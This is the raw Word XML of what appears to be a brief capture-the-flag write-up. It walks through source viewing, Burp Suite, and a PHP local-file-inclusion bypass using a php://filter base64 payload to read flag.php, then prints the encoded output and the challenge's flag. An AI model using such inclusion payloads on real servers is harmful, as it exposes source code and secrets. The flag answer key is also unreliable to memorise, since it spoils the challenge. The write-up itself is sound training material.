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CF535" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> html source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7A9D9" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F12C309" wp14:editId="4DD10C35">
            <wp:extent cx="3458058" cy="990738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E17D" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="46B67BC2" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Archive_room.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61B6AB59" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="37D8686C" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CE2238" wp14:editId="6A03BDCB">
            <wp:extent cx="3981450" cy="23051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7953" cy="230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D114" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>Page source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A39792" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9513D3" wp14:editId="6E2661E3">
            <wp:extent cx="3305636" cy="523948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BBCB" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="1503290D" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="354A8415" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>Click SECRET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9E17D" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5186324E" wp14:editId="2444C975">
            <wp:extent cx="3955733" cy="196215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1345" cy="196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334E" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="03190856" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="72618C47" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="234F731D" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="39FFD88E" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="2723A232" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D120D24" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="588EE1AA" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C740A73" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF14F4A" wp14:editId="2D7BB628">
            <wp:extent cx="3391373" cy="2638793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D9DD" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="49CF9EF8" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> secr3t.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1265F6" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E07E223" wp14:editId="0F7B4F1B">
            <wp:extent cx="5274310" cy="20002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6E5B" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>php include file and bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C4052" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C6A86" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:t>?file=php://filter/convert.base64-encode/resource=flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F5D44" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="1F79B13A" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089671FD" wp14:editId="0E9FACB6">
            <wp:extent cx="5274310" cy="2419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C867" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>Get base64 code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F64D216" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="19DC7873" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:t>PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgIC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF67EA">
        <w:lastRenderedPageBreak/>
        <w:t>AgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7OGFlOWZmZTQtYTUwMS00OGQxLThjNzQtN2NlMmVjMzAyNTMyfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05A12E" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="05052D8B" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r>
        <w:t>Decode get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0DA14" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB185A1" wp14:editId="1B603E38">
            <wp:extent cx="5274310" cy="18929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0E07" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="4E45F770" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRPr="00CF67EA" w:rsidRDefault="00294DA4" w:rsidP="00294DA4">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF67EA">
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag{8ae9ffe4-a501-48d1-8c74-7ce2ec302532}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3255CE" w14:textId="77777777" w:rsidR="00294DA4" w:rsidRPr="00CF67EA" w:rsidRDefault="00294DA4" w:rsidP="00294DA4"/>
    <w:p w14:paraId="5EBC4D42" w14:textId="77777777" w:rsidR="008D10D8" w:rsidRPr="00294DA4" w:rsidRDefault="008D10D8">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008D10D8" w:rsidRPr="00294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B0AB5" w14:textId="77777777" w:rsidR="000204E3" w:rsidRDefault="000204E3" w:rsidP="00294DA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F7E7B38" w14:textId="77777777" w:rsidR="000204E3" w:rsidRDefault="000204E3" w:rsidP="00294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E11E8" w14:textId="77777777" w:rsidR="000204E3" w:rsidRDefault="000204E3" w:rsidP="00294DA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01C50948" w14:textId="77777777" w:rsidR="000204E3" w:rsidRDefault="000204E3" w:rsidP="00294D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24"/>
    <w:rsid w:val="000204E3"/>
    <w:rsid w:val="00294DA4"/>
    <w:rsid w:val="008D10D8"/>
    <w:rsid w:val="00EB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61A5C7-F5D1-4E39-B693-DE097A34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4D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4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4D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4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4DA4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94D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94D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stare</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>stare</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-07T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-07T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>